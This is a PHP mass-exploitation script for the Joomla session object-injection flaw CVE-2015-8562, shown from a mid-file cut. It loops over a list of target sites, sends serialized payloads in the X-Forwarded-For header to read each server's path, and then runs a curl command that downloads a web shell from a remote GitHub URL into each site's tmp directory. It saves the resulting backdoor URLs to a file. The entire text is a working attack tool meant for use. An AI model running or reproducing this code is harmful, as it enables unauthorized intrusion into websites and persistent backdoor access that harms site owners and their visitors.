_SERVER["SCRIPT_FILENAME"]'; function banner() { echo "\t================================================================\n"; echo "\t Exploit Bug Joomla CVE-2015-8562 \n"; echo "\t Coded By Team NUCT \n"; echo "\t Author : The Jackerz \n"; echo "\t Visit : http://0day.nuct.or.id \n"; echo "\t Original Exploit : https://www.exploit-db.com/exploits/38977 \n"; echo "\t================================================================\n"; } function how_to() { echo "How to Use : php ".$_SERVER["PHP_SELF"]." list_target_joomla\n"; echo "Example : php ".$_SERVER["PHP_SELF"]." list.txt\n"; } function generate_payload($char) { $panjang = strlen($char); $panjang = ($panjang-1); $ord = ""; for ($i=0; $i < $panjang; $i++) { $ord .= "chr(".ord($char[$i]).")."; } $ord .= "chr(".ord($char[$i]).")"; return $ord; } function export_ke_file($site,$nama_shell) { $buka = fopen("joomla_backdoor.txt", a); fwrite($buka,trim("http://".$site."/tmp/".trim($nama_shell)."\n")); fclose($buka); } function new_file() { $buka = fopen("joomla_backdoor.txt", w); fclose($buka); } function end_checking() { echo " |\n[*] End Exploit\n"; } if (!$argv[1]) { how_to(); exit; } new_file(); $buka=fopen("$list","r"); $size=filesize("$list"); if (empty($size)) { how_to(); echo "File ".$argv[1]." empty\n"; exit; } $read=fread($buka,$size); $sites = explode("\n", $read); banner(); foreach($sites as $site) { if ($site == "http://"+$site) { $site = preg_replace("'http://'", '', $site); } echo "\n[+] Site : http://".$site; echo "\n"; echo "[*] Try Get Path Joomla\n"; //ambil cookies $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "http://$site/"); curl_setopt($ch, CURLOPT_TIMEOUT, 10); curl_setopt($ch, CURLOPT_USERAGENT, $User_Agent); curl_setopt($ch, CURLOPT_COOKIEJAR, "cookies.txt"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_exec($ch); curl_close($ch); for ($i=0;$i<2;$i++) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "http://$site/"); curl_setopt($ch, CURLOPT_TIMEOUT, 10); curl_setopt($ch, CURLOPT_USERAGENT, $User_Agent); curl_setopt($ch, CURLOPT_COOKIEFILE, "cookies.txt"); curl_setopt($ch, CURLOPT_HTTPHEADER, array("X-FORWARDED-FOR: $payload_phpinfo")); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $php_info_mentah = curl_exec($ch); curl_close($ch); } //Upload shell $php_info = explode($SCRIPT_FILENAME,$php_info_mentah); $path_root_joomla = explode('index.php', $php_info[1]); echo " |\n |=>[+] Path Joomla : ".$path_root_joomla[0]."\n"; echo " |\n[*] Try to upload shell/backdoor\n"; $generate_payload = generate_payload("system('curl https://raw.githubusercontent.com/thejackerz/backdoor/master/indoxploit.txt -o ".$path_root_joomla[0]."tmp/nuct.php && ls ".$path_root_joomla[0]."tmp | grep nuct.php');"); $backdoor = "eval(".$generate_payload.");JFactory::getConfig();exit"; $payload_terakhir=' }__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";s:'.strlen($backdoor).':"'.$backdoor.'";s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}����'; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "http://$site/"); curl_setopt($ch, CURLOPT_TIMEOUT, 10); curl_setopt($ch, CURLOPT_USERAGENT, $User_Agent); curl_setopt($ch, CURLOPT_COOKIEJAR, "cookies.txt"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_exec($ch); curl_close($ch); for ($i=0;$i<2;$i++) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "http://$site/"); curl_setopt($ch, CURLOPT_TIMEOUT, 20); curl_setopt($ch, CURLOPT_USERAGENT, $User_Agent); curl_setopt($ch, CURLOPT_COOKIEFILE, "cookies.txt"); curl_setopt($ch, CURLOPT_HTTPHEADER, array("X-FORWARDED-FOR: $payload_terakhir")); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $hasil_akhir_mentah = curl_exec($ch); curl_close($ch); } $hasil_akhir = explode('',$hasil_akhir_mentah); $hasil_final = explode('
',$hasil_akhir[1]); if (strpos($hasil_akhir_mentah, "nuct") !== false) { echo " |\n |=>[+] Uploaded :D\n"; echo " |=>[+] Path Shell/Backdoor : http://".$site."/tmp/".trim($hasil_final[0])."\n"; export_ke_file($site,$hasil_final[0]); } else { echo " |\n |=>[-] Not Uploaded :(\n"; } end_checking(); } $jumlah_uploaded = count(file("joomla_backdoor.txt")); $jumlah_list = count(file("$list")); echo "[*] Uploaded : ".$jumlah_uploaded."\n"; echo "[*] List Site : ".$jumlah_list."\n"; ?>